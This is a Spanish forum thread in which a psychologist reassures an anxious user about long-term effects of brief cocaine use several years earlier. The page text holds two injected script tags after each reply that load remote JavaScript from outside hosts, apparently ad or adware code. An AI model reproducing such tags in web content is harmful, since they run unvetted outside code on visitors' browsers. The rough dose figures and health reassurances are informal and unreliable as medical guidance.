Hace siete años que consumí cocaína

Estimada profesional de la psicología,

He leído perfectamente que responderá sólo a ciertas preguntas. Humildemente le pido si pudiera contestarme a mi pregunta ya que tengo una gran inquietud por ello. Si es posible se lo agradecería si no pues no pasa nada, también agradezco la labor que hace como experta. Y bien, le cuento: Hace aproximadamente siete años yo probé la cocaína sobre unas cinco veces. Me siento muy mal. Padezco hipocondría pensando que me pudo afectar en algo. ¿Estará mi cuerpo igual que si no la hubiese probado nunca? ¿O tendré secuelas?

1 Respuesta

Respuesta

Las preguntas que no respondo son sobre la duración de las drogas en sangre, por un tema de ética y profesionalidad.

Respecto a su pregunta, si sólo consumió esas cinco veces hace 7 años y no ha tenido ningún tipo de secuela derivada de esos consumos, puede estar bien tranquilo y seguro que está sano y no tiene porque tener ningún tipo de secuelas. Después de 7 años se hubiera manifestado, además cuando hablamos de secuelas, sobre todo es en casos de consumo abusivo y crónico o persistente, es decir o muchísima cantidad de golpe, o durante un largo período de tiempo.

Por lo tanto esté tranquilo, no tiene nada que preocuparse respecto a esos consumos.

Para cualquier aclaración no dude en contestar.

Puntúe la respuesta, gracias.

Saludos, le deseo lo mejor

Merxe

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

Estimada psicóloga,

siento molestarla de nuevo.. pero me gustaría que me aclarase a cuánta cantidad se refiere cómo mucha en una sola vez ...ya que estas veces que consumí fueron varias rayas durante una misma noche, no recuerdo pero puede que cinco o seis. Ahora me avergüenza muchísimo. Y he cogido un miedo inimaginable a cualquier sustancia o droga. Le agradecería que me aclarase la pregunta y si pudiera ser también que me comentase cómo o cuáles pueden ser las secuelas en caso de que las hubiese. A veces me pasa que mi mente está como muy agotada y no coordino bien, es cómo si tuviese una gran nube en el cerebro, y me encuentro muy abrumada.. podría deberse a ello? o póngame usted algunos ejemplos por favor.

Gracias

Herminia

La cantidad a veces no es del todo exacta ya que las drogas dependen mucho de la tolerancia y exposición a ellas, por lo que concretarte por ahí es difícil. Por ponerte un ejemplo hablaríamos de más de 4-5 gramos aproximadamente en una persona principiante o sin tolerancia establecida, en apenas 5 rayas normalmente no llega ni a un gramo, por lo que debes estar tranquila. Pero ya te digo que las cosas no son tan sencillas, ya que puede interferir la pureza, la construcción física, la tolerancia cruzada,...

Cuando me refiero a secuelas, son mucho más inmediatas que lo que me cuentas de aturdimiento, es decir accidentes cerebro-vasculares, por lo que no estaríamos en el supuesto de tu caso.

Puedes estar tranquilo, estos síntomas que describes pueden ser debidos perfectamente a la ansiedad que te genera estas dudas o la hipocondría que padeces pero no a las sustancias que tomaste entonces.

Un saludo

Merxe

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.getData"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>